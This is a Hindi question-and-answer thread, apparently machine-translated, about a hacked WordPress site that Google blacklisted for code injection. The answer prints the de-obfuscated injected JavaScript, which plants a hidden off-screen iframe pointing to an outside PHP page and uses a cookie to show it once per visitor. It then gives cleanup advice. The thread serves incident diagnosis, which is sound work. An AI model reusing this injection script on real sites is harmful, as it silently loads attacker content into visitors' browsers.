वेबसाइट पर दुर्भावनापूर्ण कोड/मैलवेयर कैसे खोजें

Question

मेरी वर्डप्रेस वेबसाइट हाल ही में मैलवेयर से संक्रमित हो गई है और इसे ब्लैकलिस्ट किया गया है। मैंने सोचा कि मैंने साइट और प्लगइन्स को अपडेट करके और किसी भी कोड को हटाकर इसे ठीक किया है जिसे मैं पहचान नहीं पाया।

तब मैंने सुकुरी साइट परीक्षक का उपयोग किया और यह ठीक लग रहा था, इसलिए मैंने Google के साथ एक समीक्षा अनुरोध सबमिट किया। हालांकि, Google ने कहा है कि इसमें अभी भी मैलवेयर कोड के रूप में मैलवेयर शामिल है (वे इसे कोड इंजेक्शन के रूप में संदर्भित करते हैं)।

मैं क्या करना चाहता हूं इसके लिए थोड़ा सा खो गया हूं। क्या Google के कोड को ढूंढने का कोई तरीका ढूंढ रहा है? डोमेन sudorf.co.uk है लेकिन इसमें मैलवेयर है इसलिए मैं वहां जाने की सलाह नहीं दूंगा - कोई विचार नहीं कि मैलवेयर क्या करेगा।

किसी भी मदद की सराहना की जाएगी।

संपादित करें: मुझे कुछ दिन पहले कोड मिला और इसे हटा दिया गया, फिर मैंने सभी संस्करणों को अपडेट किया। लेकिन जाहिर है कि यह फिर से वापस आ गया है। क्या किसी को पता है कि यह वहां कैसे हो सकता है। मेरे विचार यह है कि यह या तो प्लगइन से है - यही कारण है कि मैं उन सभी को हटाने जा रहा हूं। दूसरा संपर्क फ़ॉर्म है - लेकिन मुझे नहीं लगता था कि इससे उन्हें header.php को संपादित करने की अनुमति होगी।

Answer 1

यह शुद्ध जानकारी है। आपका मैलवेयर इस तरह दिखता है जब यह डी-समझ से परे है:

function k09() { 
    var static = 'ajax'; 
    var controller = 'index.php'; 
    var k = document.createElement('iframe'); 

    k.src = 'http://dostojewskij-gesellschaft.de/VD49Jdzr.php'; 
    k.style.position = 'absolute'; 
    k.style.color = '512'; 
    k.style.height = '512px'; 
    k.style.width = '512px'; 
    k.style.left = '1000512'; 
    k.style.top = '1000512'; 

    if (!document.getElementById('k')) { 
     document.write('<p id=\'k\' class=\'k09\' ></p>'); 
     document.getElementById('k').appendChild(k); 
    } 
} 

function SetCookie(cookieName, cookieValue, nDays, path) { 
    var today = new Date(); 
    var expire = new Date(); 
    if (nDays == null || nDays == 0) nDays = 1; 
    expire.setTime(today.getTime() + 3600000 * 24 * nDays); 
    document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : ""); 
} 

function GetCookie(name) { 
    var start = document.cookie.indexOf(name + "="); 
    var len = start + name.length + 1; 
    if ((!start) && 
     (name != document.cookie.substring(0, name.length))) { 
     return null; 
    } 
    if (start == -1) return null; 
    var end = document.cookie.indexOf(";", len); 
    if (end == -1) end = document.cookie.length; 
    return unescape(document.cookie.substring(len, end)); 
} 
if (navigator.cookieEnabled) { 
    if (GetCookie('visited_uq') == 55) {} else { 
     SetCookie('visited_uq', '55', '1', '/'); 

     k09(); 
    } 
} 

http://dostojewskij-gesellschaft.de/VD49Jdzr.php बस आउटपुट "ठीक है"।

क्यों?

मेरा अनुमान है कि यह एक आईपी/यातायात लॉगर है। शायद हैकर्स के लिए यह जांचने के लिए कि कौन से ब्लॉग सबसे सक्रिय हैं और फिर बाद में वापस आते हैं और उस विशेष साइट को हैक करते हैं (किसी साइट पर 2 आगंतुकों के साथ साइट पर समय बर्बाद करने की आवश्यकता नहीं है)। यह अच्छा और बुरा है।

अच्छा हिस्सा है कि यह लगता है कि वे अपने उपयोगकर्ता डेटाबेस या कुछ और के किसी भी उपयोग नहीं किया है है।

खराब हिस्सा यह है कि वे आपके पूरे डेटाबेस को बहुत अच्छी तरह से डाउनलोड कर चुके हैं क्योंकि उन्होंने स्पष्ट रूप से आपके सर्वर पर अधिकार निष्पादित कर लिया है, और शायद आपके PHP फाइलों को आपके सर्वर पर रखा हो सकता है। आपकी सबसे अच्छी शर्त एक ताजा WP पर शुरू करना है और उन्हें मैन्युअल रूप से जांचते समय एक-एक करके प्लगइन/थीम कॉपी करना है।

सभी पासवर्ड बदलें। यहां तक ​​कि आपका डीबी लॉगिन भी। पर विचार करें समझौता किया गया।